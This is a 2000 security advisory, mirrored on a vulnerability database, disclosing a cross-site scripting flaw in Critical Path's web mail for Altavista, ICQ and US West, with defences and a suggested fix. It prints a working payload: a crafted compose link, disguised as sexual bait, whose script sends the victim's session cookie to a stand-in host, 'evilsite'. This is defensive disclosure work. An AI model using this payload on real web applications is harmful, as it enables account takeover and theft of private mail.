Lucene search
K

Critical_Path_CSS

🗓️ 30 Aug 2000 00:00:00Reported by Jeffrey W. BakerType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Cross-site scripting vulnerability allows account access on multiple platforms, remains unaddressed.

Code
`  
Security Advisory: Cross-site scripting vulnerability compromises accounts  
on Altavista, ICQ, US West/Qwest, others  
  
*Date  
  
21 August 2000  
  
*Author  
  
Jeffrey W. Baker, email [email protected]  
  
*Copyright statement  
  
This security advisory is Copyright 2000 by Jeffrey William Baker  
([email protected]). The advisory may be distributed in whole or in part  
without modification.  
  
*Background  
  
I was a programmer at Critical Path until 1/12/1999. I did not discover  
this vulnerability as a result of any of my work there. I was not  
assigned to the web mail product. I have not used any proprietary  
knowledge of Critical Path's systems in investigating this problem.  
  
This vulnerability was discovered on 17/7/2000, while I was conducting  
research for a presentation at the O'Reilly Open Source Convention. The  
vulnerability was first discussed by about 100 people at that conference.  
Critical Path's engineering, operations, and management staffs were  
contacted about the probem on 21/7/2000. They have not responded after a  
generous 30 days, and the problem is still present in their production  
service. Therefore the problem must be presented to the public at large.  
  
*Synopsis  
  
A simple flaw in the web mail service offered by Critical Path  
(www.cp.net) allows an attacker to gain full access of any webmail  
account. The attack falls under the umbrella of cross-site scripting,  
which was addressed in detail by CERT in their advisory CA-2000-02,  
entitled "Malicious HTML Tags Embedded in Client Web Requests." The bug  
is aggravated by an defective session token scheme.  
  
*Details  
  
The attack works by tricking a legitimate web mail user into clicking on a  
link while logged into the web mail system. The link exploits a  
programming error in the web mail system to send the user's username and  
session cookie to another site. The username and session cookie can then  
be used to gain full control over the user's account.  
  
The user is vulnerable to the attack at any time after logging in to the  
webmail system, and before explicitly logging out, as long as the browser  
is not restarted. After the attack, the attacker will be able to read and  
delete the victim's mail, send mail as the victim, and otherwise fully  
impersonate the victim any time that the victim is logged in. The  
attacker will have control over the victim's account forever, even if the  
victim changes his password.  
  
Web mail authenticates users using usernames and passwords. After a  
successful login, the user is given an HTTP cookie, with the name "CPWMS"  
and the value of "username/hash". The hash part of the cookie is a  
32-character hexidecimal value. The hash is always the same, every time  
the user logs in, even if he changes his password. This session hash  
problem deserves an advisory of its own, but in this advisory, it serves  
to increase the severity of the vulnerability.  
  
The cookie is sent to the browser for expiration when the browser is  
closed. The cookie is valid forever. The only way to invalidate a cookie  
is to explicitly log out, using the "Log out" button on the web mail user  
interface. However, the cookie will immediately become valid again  
whenever the user logs in again. Thus, once a sucessful attack has been  
made, the attacker effectively owns the account.  
  
The attacker must make the victim follow a link while the victim is logged  
on to web mail. The link must make the victim activate the web mail  
composition user interface and submit some form data. The composition  
interface will then echo this input back to the user, without escaping the  
HTML entities. If the submitted form data includes JavaScript commands,  
the attacker can make the user's web browser send the authentication  
cookie to the attacker's site, where the attacker can collect them for  
use.  
  
The best way to make sure that the victim is logged on to web mail is to  
send them the link in a mail message. The web mail UI renders HTML  
content in an email as HTML. Thus, the attacker could send this mail body  
to a user of mail.altavista.com (ignore newlines, they are inserted for  
readability):  
  
<a href="http://mail.altavista.com/mail/compose?  
contentonly=0&  
send=SEND!&  
to=&  
subject=&  
cc=&  
bcc=&  
include_sig=1&  
body=%3C/TEXTAREA%3E%3CSCRIPT%20language=%22JavaScript%22%3E  
document.location=%22http://evilsite/%22%20%2Bdocument.cookie%3B%3C  
/SCRIPT%3E&id=">Click here for hot, naked teens!</a>  
  
When the web mail app receives this request, it unescapes the query  
arguments and places them inside an HTML TEXTAREA element. The unescaped  
argument then closes the TEXTAREA element and inserts a JavaScript command  
which is executed when the page is loaded by any web browser with  
JavaScript capabilities.  
  
When the script executes, the browser will send a request to "evilsite"  
which includes the user's session cookie. The operator of evilsite will  
then have full control over the user's account. In the case of  
altavista.com, evilsite will also receive several cookies set by the  
.altavista.com domain, which is a sort of a bonus. If the operator of  
evilsite is smart, he can deliver some useful content to the victim, and  
the victim may not even be aware of any problem.  
  
The attacker would access the victim's account by placing the session  
cookie in his cookies file and visiting mail.altavista.com. He could use  
any capability of the account, with the exception of changing the  
password. The old password must be known to change the password. This is  
hardly a problem though, because the victim can change the password and  
the attacker's access will be uninterrupted.  
  
*User Impact  
  
This bug impacts most users of Critical Path's web mail service. This  
service is offered by Critical Path under many brands, including altavista  
(mail.altavista.com), us west (mail.uswestmail.net), icq  
(mail.icqmail.com), and etrade (mail.etrademail.com). These brands are  
well-known and reported in Critical Path's press releases. Other users of  
Critical Path's service can be found by inspecting the public DNS records.  
Critical Path claims over 30 million users of its mail services through us  
west, altavista, and icq alone.  
  
Users of etrademail.com are not vulnerable to this attack because their  
session hashes are stored in the URL, not in cookies. Other services that  
use URLs instead of cookies are also immune to this particular attack.  
(Users of etrademail.com have another problem in that they have no "Log  
out" button at all, but that is a separate issue).  
  
The user can defend against this bug by:  
  
1) Turning off JavaScript in the browser. This has been suggested many  
times, and it is still quite a good idea.  
  
2) Not clicking on links from mail messages. If a user wishes to click on  
a link from a web mail interface, they should bookmark the link, log out  
of web mail, and then visit the bookmark.  
  
3) Logging out of web mail. This will prevent the attacker from using the  
web mail account when the victim is not using it.  
  
4) Not using web mail. Traditional Mail User Agents, such as pine and  
eudora, are not vulnerable to this style of attack. Web mail interfaces  
should only be used as a last resort.  
  
*Suggested resolution  
  
The web mail software should escape all HTML entities that appear in user  
input. No user input should ever be inserted into a response unless the  
input has been properly escaped. If the input was properly escaped on  
this page, the JavaScript code would appear harmlessly inside the text  
input widget. User input is properly escaped in most places on the web  
mail interface, but the mail composition interface is defective.  
  
Critical Path should take a more aggressive approach to plugging security  
holes. They should have responded to my offers of assistance quickly and  
positively. Their millions of users could have been using a more secure  
product by now.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation